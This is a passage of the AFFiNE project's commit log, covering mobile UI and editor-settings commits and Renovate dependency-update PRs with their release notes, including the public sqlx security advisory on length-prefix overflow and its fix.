- [`a877e5a`](https://togithub.com/oxc-project/oxc/commit/a877e5a ) linter/no-unused-vars: Ensure type annotations on property accessors are considered used ([#​5183](https://togithub.com/oxc-project/oxc/issues/5183 )) (DonIsaac)
- [`7886618`](https://togithub.com/oxc-project/oxc/commit/7886618 ) linter/unicorn: Add fixer tests for `no-null` ([#​5173](https://togithub.com/oxc-project/oxc/issues/5173 )) (DonIsaac)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguNTYuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-30 04:46:09 +00:00
renovate
69892655a1
chore: bump up valtio version to v2 ( #8025 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [valtio](https://togithub.com/pmndrs/valtio ) | [`^1.13.2` -> `^2.0.0`](https://renovatebot.com/diffs/npm/valtio/1.13.2/2.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>pmndrs/valtio (valtio)</summary>
### [`v2.0.0`](https://togithub.com/pmndrs/valtio/releases/tag/v2.0.0 )
[Compare Source](https://togithub.com/pmndrs/valtio/compare/v1.13.2...v2.0.0 )
### 🎉 🎉 🎉 Valtio v2 is Here! 🍾 🍾 🍾
#### Small Breaking Changes
Most users won't even notice the differences, but we recommend checking out the [migration guide](https://togithub.com/pmndrs/valtio/blob/main/docs/guides/migrating-to-v2.mdx ) to ensure a smooth transition.
#### New Emoji
💊 -> 🧙
Say hello to our new emoji! This change symbolizes the magic of Valtio.
#### Let’s Grow the Ecosystem Together!
We are entering a new era of Valtio development, and we need your help to grow the ecosystem. Whether you are an experienced contributor or just getting started, now is the perfect time to join us!
#### What's Changed
- v2 by [@​dai-shi](https://togithub.com/dai-shi ) in [https://github.com/pmndrs/valtio/pull/810 ](https://togithub.com/pmndrs/valtio/pull/810 )
- feat(core): expose internal states and functions by [@​dai-shi](https://togithub.com/dai-shi ) in [https://github.com/pmndrs/valtio/pull/931 ](https://togithub.com/pmndrs/valtio/pull/931 )
- breaking(vanilla): do not handle promises by [@​dai-shi](https://togithub.com/dai-shi ) in [https://github.com/pmndrs/valtio/pull/934 ](https://togithub.com/pmndrs/valtio/pull/934 )
#### New Contributors
- [@​AmirSa12](https://togithub.com/AmirSa12 ) made their first contribution in [https://github.com/pmndrs/valtio/pull/898 ](https://togithub.com/pmndrs/valtio/pull/898 )
- [@​TotallyBiased](https://togithub.com/TotallyBiased ) made their first contribution in [https://github.com/pmndrs/valtio/pull/901 ](https://togithub.com/pmndrs/valtio/pull/901 )
- [@​L-Qun](https://togithub.com/L-Qun ) made their first contribution in [https://github.com/pmndrs/valtio/pull/908 ](https://togithub.com/pmndrs/valtio/pull/908 )
- [@​himself65](https://togithub.com/himself65 ) made their first contribution in [https://github.com/pmndrs/valtio/pull/920 ](https://togithub.com/pmndrs/valtio/pull/920 )
- [@​kciter](https://togithub.com/kciter ) made their first contribution in [https://github.com/pmndrs/valtio/pull/922 ](https://togithub.com/pmndrs/valtio/pull/922 )
**Full Changelog**: https://github.com/pmndrs/valtio/compare/v1.13.2...v2.0.0
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41Ni4wIiwidXBkYXRlZEluVmVyIjoiMzguNTYuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-30 04:34:04 +00:00
JimmFly
f99988afa6
feat(core): bump blocksuite/icons ( #8024 )
2024-08-30 03:42:52 +00:00
pengx17
4ff6fbd052
fix(core): hairline boarders for divider ( #8021 )
2024-08-30 02:31:28 +00:00
pengx17
f544e69d02
fix(mobile): modal styles on mobile ( #8023 )
...
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/T2klNLEk0wxLh4NRDzhk/92c0cc55-1f75-42b7-a83f-4ffa6cf205ad.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/T2klNLEk0wxLh4NRDzhk/92c0cc55-1f75-42b7-a83f-4ffa6cf205ad.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/T2klNLEk0wxLh4NRDzhk/92c0cc55-1f75-42b7-a83f-4ffa6cf205ad.mp4 ">20240829-1420-07.7370936.mp4</video>
2024-08-29 16:45:23 +00:00
pengx17
adf314d594
fix(mobile): adjust peek view style for mobile ( #8003 )
...

2024-08-29 16:45:22 +00:00
pengx17
7ae141bd9e
feat(mobile): add mobile detail page ( #7993 )
...
fix AF-1241
2024-08-29 16:45:22 +00:00
pengx17
f8e6f1f2b5
chore: add mobile scope ( #8020 )
2024-08-29 16:45:21 +00:00
CatsJuice
f1bb1fc9b8
feat(mobile): search page ui ( #8012 )
...
feat(mobile): search page ui
fix(core): quick search tags performance issue
2024-08-29 09:05:23 +00:00
JimmFly
5e8683c9be
feat(core): add outgoing links to doc info ( #7955 )
...
close AF-1270

2024-08-29 06:41:41 +00:00
CatsJuice
3ce92f2abc
feat(mobile): all docs page ui impl ( #7976 )
2024-08-29 06:09:48 +00:00
CatsJuice
db76780bc9
feat(mobile): mobile index page UI ( #7959 )
2024-08-29 06:09:47 +00:00
CatsJuice
f37051dc87
feat(core): mobile renderer for explorer ( #7942 )
2024-08-29 06:09:45 +00:00
EYHN
b96ad57568
feat(core): import template ( #8000 )
2024-08-29 04:01:35 +00:00
JimmFly
4ec45a247e
feat(core): add sign in button to shared doc ( #7952 )
...

2024-08-29 02:44:06 +00:00
darkskygit
dde45748d9
feat: filter out empty workpace in sidebar list ( #7960 )
...
fix PD-1567
2024-08-28 08:43:44 +00:00
L-Sun
06685683ae
fix(core): add mobile edit button ( #7996 )
2024-08-28 06:38:45 +00:00
JimmFly
65a87196d5
feat(core): impl the Doc Info and Bi-Directional Links display settings ( #7991 )
...
https://github.com/user-attachments/assets/a469254c-a2ea-4cf4-837e-f9a8bbe5b378
2024-08-28 02:35:29 +00:00
JimmFly
09ab922572
feat(core): add new doc default mode setting ( #7990 )
...
https://github.com/user-attachments/assets/523b14f3-ee42-4061-8ca2-221e071d5cc9
2024-08-28 02:35:28 +00:00
JimmFly
c53adbc7e8
chore: adjust font menu and slider style ( #7989 )
...


2024-08-28 02:35:26 +00:00
JimmFly
03b2cda845
refactor(core): move fontFamily and fullWidthLayout to editor settings ( #7988 )
2024-08-28 02:35:24 +00:00
EYHN
3e810eb043
fix(core): no share page in desktop ( #7983 )
2024-08-27 12:37:30 +00:00
JimmFly
b8f07ce3fc
chore(core): disable expand database block ( #7984 )
...
close AF-1271
2024-08-27 12:24:48 +00:00
darkskygit
10a066a52a
fix(native): return type casts ( #7986 )
2024-08-27 05:53:05 +00:00
DarkSky
6557b5d4b6
fix: native binding ( #7985 )
2024-08-27 12:31:25 +08:00
Brooooooklyn
67c9c7bcc5
ci: send slack message to channel after deploy ( #7889 )
2024-08-27 03:01:55 +00:00
renovate
e44a9483c2
chore: bump up @marsidev/react-turnstile version to v1 ( #7940 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@marsidev/react-turnstile](https://togithub.com/marsidev/react-turnstile ) | [`^0.7.0` -> `^1.0.0`](https://renovatebot.com/diffs/npm/@marsidev%2freact-turnstile/0.7.2/1.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>marsidev/react-turnstile (@​marsidev/react-turnstile)</summary>
### [`v1.0.0`](https://togithub.com/marsidev/react-turnstile/releases/tag/v1.0.0 )
[Compare Source](https://togithub.com/marsidev/react-turnstile/compare/v0.7.2...v1.0.0 )
##### 🚨 Breaking Changes
- Now we ship ESM-only code, this will decrease the bundle size significantly.
If you are a CommonJS user, I suggest you to keep using the version `0.7.2` or upgrade your project to ESM.
- Removed "auto" widget size due to is not even a valid size for Cloudflare Turnstile.
We have been sending `undefined` when the size was "auto", so if you were using this size, then you can simply remove it.
- Peer dependencies for `react` and `react-dom` have been updated to 17.x and above.
##### 🚀 Features
- Added callback `onTimeout`
- Added render options `refreshTimeout` and `feedbackEnabled` (Closes [#​82](https://togithub.com/marsidev/react-turnstile/issues/82 ))
- Added new "flexible" widget size (Closes [#​82](https://togithub.com/marsidev/react-turnstile/issues/82 ))
##### 🐛 Fixes
- Updated "compact" widget size to 150x140 (Closes [#​85](https://togithub.com/marsidev/react-turnstile/issues/85 ))
##### 🛠 Misc
##### Build
- We migrated from [unbuild](https://togithub.com/unjs/unbuild ) to [tsup](https://togithub.com/egoist/tsup )
- The generated build is now minified, this will decrease the bundle size significantly.
##### TypeScript
- Improved type definitions. Now we expose these types: `AppearanceMode`, `ExecutionMode`, `FailureRetryMode`, `RefreshExpiredMode`, `RefreshTimeoutMode`, `WidgetSize`. Inspired by [@​types/cloudflare-turnstile](https://www.npmjs.com/package/@​types/cloudflare-turnstile )
##### Other
- Updated dependencies
- Updated docs
- Added issue templates and policies
##### [View changes on GitHub](https://togithub.com/marsidev/react-turnstile/compare/v0.7.2...v1.0.0 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-27 02:50:53 +00:00
renovate
ecf50a4dad
chore: bump up happy-dom version to v15 ( #7941 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [happy-dom](https://togithub.com/capricorn86/happy-dom ) | [`^14.7.1` -> `^15.0.0`](https://renovatebot.com/diffs/npm/happy-dom/14.12.3/15.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>capricorn86/happy-dom (happy-dom)</summary>
### [`v15.0.0`](https://togithub.com/capricorn86/happy-dom/releases/tag/v15.0.0 )
[Compare Source](https://togithub.com/capricorn86/happy-dom/compare/v14.12.3...v15.0.0 )
##### 💣 Breaking Changes
- Implements remaining HTML elements - By **[@​betterqualityassuranceuser](https://togithub.com/betterqualityassuranceuser )** in task [#​1332](https://togithub.com/capricorn86/happy-dom/issues/1332 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-27 02:40:19 +00:00
forehalo
0209e3fa76
fix(core): avoid expand runtime config everywhere used ( #7972 )
2024-08-26 12:22:52 +00:00
EYHN
9ea4aaaf37
refactor(infra): remove setimmediate ( #7975 )
2024-08-26 11:57:24 +00:00
pengx17
611925fa10
fix(electron): adjust app-tabs-header styles ( #7961 )
...



also fix PD-1631
2024-08-26 09:34:27 +00:00
EYHN
bc86f0a672
feat(core): editor setting service ( #7956 )
...
define editor setting schema in `packages/frontend/core/src/modules/editor-settting/schema.ts`
e.g.
```ts
const BSEditorSettingSchema = z.object({
connector: z.object({
stroke: z
.union([
z.string(),
z.object({
dark: z.string(),
light: z.string(),
}),
])
.default('#000000 '), // default is necessary
}),
});
```
schema can be defined in a nested way. EditorSetting api is in flat way:
editorSetting api:
```ts
editorSetting.settings$ === {
'connector.stroke': '#000000 '
}
editorSetting.set('connector.stroke', '#000 ')
```
and use `expandFlattenObject` function can restore the flattened structure to a nested structure. nested structure is required by blocksuite
```ts
editorSetting.settings$.map(expandFlattenObject) === {
connector: {
stroke: '#000000 '
}
}
```
2024-08-26 08:19:24 +00:00
JimmFly
3c37006657
chore(core): add Display bi-directional links setting row ui ( #7954 )
...
close AF-1269

2024-08-26 06:25:32 +00:00
Don Isaac
dbcfd24ed8
fix: remove unused variables ( #7968 )
2024-08-26 14:23:56 +08:00
forehalo
14066965fa
fix(server): wrong table used for userspace data ( #7969 )
2024-08-26 06:11:22 +00:00
renovate
01c9d1758e
chore: bump up Rust crate sqlx to 0.8 [SECURITY] ( #7965 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Type | Update | Change |
|---|---|---|---|
| [sqlx](https://togithub.com/launchbadge/sqlx ) | workspace.dependencies | minor | `0.7` -> `0.8` |
### GitHub Vulnerability Alerts
#### [GHSA-xmrp-424f-vfpx](https://togithub.com/launchbadge/sqlx/issues/3440 )
The following presentation at this year's DEF CON was brought to our attention on the SQLx Discord:
> SQL Injection isn't Dead: Smuggling Queries at the Protocol Level
> <http://web.archive.org/web/20240812130923/https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20presentations/DEF%20CON%2032%20-%20Paul%20Gerste%20-%20SQL%20Injection%20Isn't%20Dead%20Smuggling%20Queries%20at%20the%20Protocol%20Level.pdf >
> (Archive link for posterity.)
Essentially, encoding a value larger than 4GiB can cause the length prefix in the protocol to overflow,
causing the server to interpret the rest of the string as binary protocol commands or other data.
It appears SQLx _does_ perform truncating casts in a way that could be problematic,
for example: <6f2905695b/sqlx-postgres/src/arguments.rs (L163) >
This code has existed essentially since the beginning,
so it is reasonable to assume that all published versions `<= 0.8.0` are affected.
## Mitigation
As always, you should make sure your application is validating untrustworthy user input.
Reject any input over 4 GiB, or any input that could _encode_ to a string longer than 4 GiB.
Dynamically built queries are also potentially problematic if it pushes the message size over this 4 GiB bound.
[`Encode::size_hint()`](https://docs.rs/sqlx/latest/sqlx/trait.Encode.html#method.size_hint )
can be used for sanity checks, but do not assume that the size returned is accurate.
For example, the `Json<T>` and `Text<T>` adapters have no reasonable way to predict or estimate the final encoded size,
so they just return `size_of::<T>()` instead.
For web application backends, consider adding some middleware that limits the size of request bodies by default.
## Resolution
Work has started on a branch to add `#[deny]` directives for the following Clippy lints:
* [`cast_possible_truncation`](https://rust-lang.github.io/rust-clippy/master/#/cast_possible_truncation )
* [`cast_possible_wrap`](https://rust-lang.github.io/rust-clippy/master/#/cast_possible_wrap )
* [`cast_sign_loss`](https://rust-lang.github.io/rust-clippy/master/#/cast_sign_loss )
and to manually audit the code that they flag.
A fix is expected to be included in the `0.8.1` release (still WIP as of writing).
---
### Release Notes
<details>
<summary>launchbadge/sqlx (sqlx)</summary>
### [`v0.8.1`](https://togithub.com/launchbadge/sqlx/blob/HEAD/CHANGELOG.md#081---2024-08-23 )
[Compare Source](https://togithub.com/launchbadge/sqlx/compare/v0.8.0...v0.8.1 )
16 pull requests were merged this release cycle.
This release contains a fix for [RUSTSEC-2024-0363].
Postgres users are advised to upgrade ASAP as a possible exploit has been demonstrated:
[#​3440 (comment)](https://togithub.com/launchbadge/sqlx/issues/3440#issuecomment-2307956901 )
MySQL and SQLite do not *appear* to be exploitable, but upgrading is recommended nonetheless.
##### Added
- \[[#​3421]]: correct spelling of `MySqlConnectOptions::no_engine_substitution()` \[\[[@​kolinfluence](https://togithub.com/kolinfluence )]]
- Deprecates `MySqlConnectOptions::no_engine_subsitution()` (oops) in favor of the correctly spelled version.
##### Changed
- \[[#​3376]]: doc: hide `spec_error` module \[\[[@​abonander](https://togithub.com/abonander )]]
- This is a helper module for the macros and was not meant to be exposed.
- It is not expected to receive any breaking changes for the 0.8.x release, but is not designed as a public API.
Use at your own risk.
- \[[#​3382]]: feat: bumped to `libsqlite3-sys=0.30.1` to support sqlite 3.46 \[\[[@​CommanderStorm](https://togithub.com/CommanderStorm )]]
- \[[#​3385]]: chore(examples):Migrated the pg-chat example to ratatui \[\[[@​CommanderStorm](https://togithub.com/CommanderStorm )]]
- \[[#​3399]]: Upgrade to rustls 0.23 \[\[[@​djc](https://togithub.com/djc )]]
- RusTLS now has pluggable cryptography providers: `ring` (the existing implementation),
and `aws-lc-rs` which has optional FIPS certification.
- The existing features activating RusTLS (`runtime-tokio-rustls`, `runtime-async-std-rustls`, `tls-rustls`)
enable the `ring` provider of RusTLS to match the existing behavior so this *should not* be a breaking change.
- Switch to the `tls-rustls-aws-lc-rs` feature to use the `aws-lc-rs` provider.
- If using `runtime-tokio-rustls` or `runtime-async-std-rustls`,
this will necessitate switching to the appropriate non-legacy runtime feature:
`runtime-tokio` or `runtime-async-std`
- See the RusTLS README for more details: <https://github.com/rustls/rustls?tab=readme-ov-file#cryptography-providers >
##### Fixed
- \[[#​2786]]: fix(sqlx-cli): do not clean sqlx during prepare \[\[[@​cycraig](https://togithub.com/cycraig )]]
- \[[#​3354]]: sqlite: fix inconsistent read-after-write \[\[[@​ckampfe](https://togithub.com/ckampfe )]]
- \[[#​3371]]: Fix encoding and decoding of MySQL enums in `sqlx::Type` \[\[[@​alu](https://togithub.com/alu )]]
- \[[#​3374]]: fix: usage of `node12` in `SQLx` action \[\[[@​hamirmahal](https://togithub.com/hamirmahal )]]
- \[[#​3380]]: chore: replace structopt with clap in examples \[\[[@​tottoto](https://togithub.com/tottoto )]]
- \[[#​3381]]: Fix CI after Rust 1.80, remove dead feature references \[\[[@​abonander](https://togithub.com/abonander )]]
- \[[#​3384]]: chore(tests): fixed deprecation warnings \[\[[@​CommanderStorm](https://togithub.com/CommanderStorm )]]
- \[[#​3386]]: fix(dependencys):bumped cargo_metadata to `v0.18.1` to avoid yanked `v0.14.3` \[\[[@​CommanderStorm](https://togithub.com/CommanderStorm )]]
- \[[#​3389]]: fix(cli): typo in error for required DB URL \[\[[@​ods](https://togithub.com/ods )]]
- \[[#​3417]]: Update version to 0.8 in README \[\[[@​soucosmo](https://togithub.com/soucosmo )]]
- \[[#​3441]]: fix: audit protocol handling \[\[[@​abonander](https://togithub.com/abonander )]]
- This addresses [RUSTSEC-2024-0363] and includes regression tests for MySQL, Postgres and SQLite.
[#​2786]: https://togithub.com/launchbadge/sqlx/pull/2786
[#​3354]: https://togithub.com/launchbadge/sqlx/pull/3354
[#​3371]: https://togithub.com/launchbadge/sqlx/pull/3371
[#​3374]: https://togithub.com/launchbadge/sqlx/pull/3374
[#​3376]: https://togithub.com/launchbadge/sqlx/pull/3376
[#​3380]: https://togithub.com/launchbadge/sqlx/pull/3380
[#​3381]: https://togithub.com/launchbadge/sqlx/pull/3381
[#​3382]: https://togithub.com/launchbadge/sqlx/pull/3382
[#​3384]: https://togithub.com/launchbadge/sqlx/pull/3384
[#​3385]: https://togithub.com/launchbadge/sqlx/pull/3385
[#​3386]: https://togithub.com/launchbadge/sqlx/pull/3386
[#​3389]: https://togithub.com/launchbadge/sqlx/pull/3389
[#​3399]: https://togithub.com/launchbadge/sqlx/pull/3399
[#​3417]: https://togithub.com/launchbadge/sqlx/pull/3417
[#​3421]: https://togithub.com/launchbadge/sqlx/pull/3421
[#​3441]: https://togithub.com/launchbadge/sqlx/pull/3441
[RUSTSEC-2024-0363]: https://rustsec.org/advisories/RUSTSEC-2024-0363.html
### [`v0.8.0`](https://togithub.com/launchbadge/sqlx/blob/HEAD/CHANGELOG.md#080---2024-07-22 )
[Compare Source](https://togithub.com/launchbadge/sqlx/compare/v0.7.4...v0.8.0 )
70 pull requests were merged this release cycle.
[#​2697] was merged the same day as release 0.7.4 and so was missed by the automatic CHANGELOG generation.
##### Breaking
- \[[#​2697]]: fix(macros): only enable chrono when time is disabled \[\[[@​saiintbrisson](https://togithub.com/saiintbrisson )]]
- \[[#​2973]]: Generic Associated Types in Database, replacing HasValueRef, HasArguments, HasStatement \[\[[@​nitn3lav](https://togithub.com/nitn3lav )]]
- \[[#​2482]]: chore: bump syn to 2.0 \[\[[@​saiintbrisson](https://togithub.com/saiintbrisson )]]
- Deprecated type ascription syntax in the query macros was removed.
- \[[#​2736]]: Fix describe on PostgreSQL views with rules \[\[[@​tsing](https://togithub.com/tsing )]]
- Potentially breaking: nullability inference changes for Postgres.
- \[[#​2869]]: Implement PgHasArrayType for all references \[\[[@​tylerhawkes](https://togithub.com/tylerhawkes )]]
- Conflicts with existing manual implementations.
- \[[#​2940]]: fix: Decode and Encode derives ([#​1031](https://togithub.com/launchbadge/sqlx/issues/1031 )) \[\[[@​benluelo](https://togithub.com/benluelo )]]
- Changes lifetime obligations for field types.
- \[[#​3064]]: Sqlite explain graph \[\[[@​tyrelr](https://togithub.com/tyrelr )]]
- Potentially breaking: nullability inference changes for SQLite.
- \[[#​3123]]: Reorder attrs in sqlx::test macro \[\[[@​bobozaur](https://togithub.com/bobozaur )]]
- Potentially breaking: attributes on `#[sqlx::test]` usages are applied in the correct order now.
- \[[#​3126]]: Make Encode return a result \[\[[@​FSMaxB](https://togithub.com/FSMaxB )]]
- \[[#​3130]]: Add version information for failed cli migration ([#​3129](https://togithub.com/launchbadge/sqlx/issues/3129 )) \[\[[@​FlakM](https://togithub.com/FlakM )]]
- Breaking changes to `MigrateError`.
- \[[#​3181]]: feat: no tx migration \[\[[@​cleverjam](https://togithub.com/cleverjam )]]
- (Postgres only) migrations that should not run in a transaction can be flagged by adding `-- no-transaction` to the beginning.
- Breaking change: added field to `Migration`
- \[[#​3184]]: \[BREAKING} fix(sqlite): always use `i64` as intermediate when decoding \[\[[@​abonander](https://togithub.com/abonander )]]
- integer decoding will now loudly error on overflow instead of silently truncating.
- some usages of the query!() macros might change an i32 to an i64.
- \[[#​3252]]: fix `#[derive(sqlx::Type)]` in Postgres \[\[[@​abonander](https://togithub.com/abonander )]]
- Manual implementations of PgHasArrayType for enums will conflict with the generated one. Delete the manual impl or add `#[sqlx(no_pg_array)]` where conflicts occur.
- Type equality for PgTypeInfo is now schema-aware.
- \[[#​3329]]: fix: correct handling of arrays of custom types in Postgres \[\[[@​abonander](https://togithub.com/abonander )]]
- Potential breaking change: `PgTypeInfo::with_name()` infers types that start with `_` to be arrays of the un-prefixed type. Wrap type names in quotes to bypass this behavior.
- \[[#​3356]]: breaking: fix name collision in `FromRow`, return `Error::ColumnDecode` for `TryFrom` errors \[\[[@​abonander](https://togithub.com/abonander )]]
- Breaking behavior change: errors with `#[sqlx(try_from = "T")]` now return `Error::ColumnDecode` instead of `Error::ColumnNotFound`.
- Breaking because `#[sqlx(default)]` on an individual field or the struct itself would have previously suppressed the error.
This doesn't seem like good behavior as it could result in some potentially very difficult bugs.
- Instead, create a wrapper implementing `From` and apply the default explicitly.
- \[[#​3337]]: allow rename with rename_all (close [#​2896](https://togithub.com/launchbadge/sqlx/issues/2896 )) \[\[[@​DirectorX](https://togithub.com/DirectorX )]]
- Changes the precedence of `#[sqlx(rename)]` and `#[sqlx(rename_all)]` to match the expected behavior (`rename` wins).
- \[[#​3285]]: fix: use correct names for sslmode options \[\[[@​lily-mosquitoes](https://togithub.com/lily-mosquitoes )]]
- Changes the output of `ConnectOptions::to_url_lossy()` to match what parsing expects.
##### Added
- \[[#​2917]]: Add Debug impl for PgRow \[\[[@​g-bartoszek](https://togithub.com/g-bartoszek )]]
- \[[#​3113]]: feat: new derive feature flag \[\[[@​saiintbrisson](https://togithub.com/saiintbrisson )]]
- \[[#​3154]]: feat: add `MySqlTime`, audit `mysql::types` for panics \[\[[@​abonander](https://togithub.com/abonander )]]
- \[[#​3188]]: feat(cube): support postgres cube \[\[[@​jayy-lmao](https://togithub.com/jayy-lmao )]]
- \[[#​3244]]: feat: support `NonZero*` scalar types \[\[[@​AlphaKeks](https://togithub.com/AlphaKeks )]]
- \[[#​3260]]: feat: Add set_update_hook on SqliteConnection \[\[[@​gridbox](https://togithub.com/gridbox )]]
- \[[#​3291]]: feat: support the Postgres Bool type for the Any driver \[\[[@​etorreborre](https://togithub.com/etorreborre )]]
- \[[#​3293]]: Add LICENSE-\* files to crates \[\[[@​LecrisUT](https://togithub.com/LecrisUT )]]
- \[[#​3303]]: add array support for NonZeroI\* in postgres \[\[[@​JohannesIBK](https://togithub.com/JohannesIBK )]]
- \[[#​3311]]: Add example on how to use Transaction as Executor \[\[[@​Lachstec](https://togithub.com/Lachstec )]]
- \[[#​3343]]: Add support for PostgreSQL HSTORE data type \[\[[@​KobusEllis](https://togithub.com/KobusEllis )]]
##### Changed
- \[[#​2652]]: MySQL: Remove collation compatibility check for strings \[\[[@​alu](https://togithub.com/alu )]]
- \[[#​2960]]: Removed `Send` trait bound from argument binding \[\[[@​bobozaur](https://togithub.com/bobozaur )]]
- \[[#​2970]]: refactor: lift type mappings into driver crates \[\[[@​abonander](https://togithub.com/abonander )]]
- \[[#​3148]]: Bump libsqlite3-sys to v0.28 \[\[[@​NfNitLoop](https://togithub.com/NfNitLoop )]]
- Note: version bumps to `libsqlite3-sys` are not considered breaking changes as per our semver guarantees.
- \[[#​3265]]: perf: box `MySqlConnection` to reduce sizes of futures \[\[[@​stepantubanov](https://togithub.com/stepantubanov )]]
- \[[#​3352]]: chore:added a testcase for `sqlx migrate add ...` \[\[[@​CommanderStorm](https://togithub.com/CommanderStorm )]]
- \[[#​3340]]: ci: Add job to check that sqlx builds with its declared minimum dependencies \[\[[@​iamjpotts](https://togithub.com/iamjpotts )]]
##### Fixed
- \[[#​2702]]: Constrain cyclic associated types to themselves \[\[[@​BadBastion](https://togithub.com/BadBastion )]]
- \[[#​2954]]: Fix several inter doc links \[\[[@​ralpha](https://togithub.com/ralpha )]]
- \[[#​3073]]: feat(logging): Log slow acquires from connection pool \[\[[@​iamjpotts](https://togithub.com/iamjpotts )]]
- \[[#​3137]]: SqliteConnectOptions::filename() memory fix ([#​3136](https://togithub.com/launchbadge/sqlx/issues/3136 )) \[\[[@​hoxxep](https://togithub.com/hoxxep )]]
- \[[#​3138]]: PostgreSQL Bugfix: Ensure connection is usable after failed COPY inside a transaction \[\[[@​feikesteenbergen](https://togithub.com/feikesteenbergen )]]
- \[[#​3146]]: fix(sqlite): delete unused `ConnectionHandleRaw` type \[\[[@​abonander](https://togithub.com/abonander )]]
- \[[#​3162]]: Drop urlencoding dependency \[\[[@​paolobarbolini](https://togithub.com/paolobarbolini )]]
- \[[#​3165]]: Bump deps that do not need code changes \[\[[@​GnomedDev](https://togithub.com/GnomedDev )]]
- \[[#​3167]]: fix(ci): use `docker compose` instead of `docker-compose` \[\[[@​abonander](https://togithub.com/abonander )]]
- \[[#​3172]]: fix: Option decoding in any driver \[\[[@​pxp9](https://togithub.com/pxp9 )]]
- \[[#​3173]]: fix(postgres) : int type conversion while decoding \[\[[@​RaghavRox](https://togithub.com/RaghavRox )]]
- \[[#​3190]]: Update time to 0.3.36 \[\[[@​BlackSoulHub](https://togithub.com/BlackSoulHub )]]
- \[[#​3191]]: Fix unclean TLS shutdown \[\[[@​levkk](https://togithub.com/levkk )]]
- \[[#​3194]]: Fix leaking connections in fetch_optional ([#​2647](https://togithub.com/launchbadge/sqlx/issues/2647 )) \[\[[@​danjpgriffin](https://togithub.com/danjpgriffin )]]
- \[[#​3216]]: security: bump rustls to 0.21.11 \[\[[@​toxeus](https://togithub.com/toxeus )]]
- \[[#​3230]]: fix: sqlite pragma order for auto_vacuum \[\[[@​jasonish](https://togithub.com/jasonish )]]
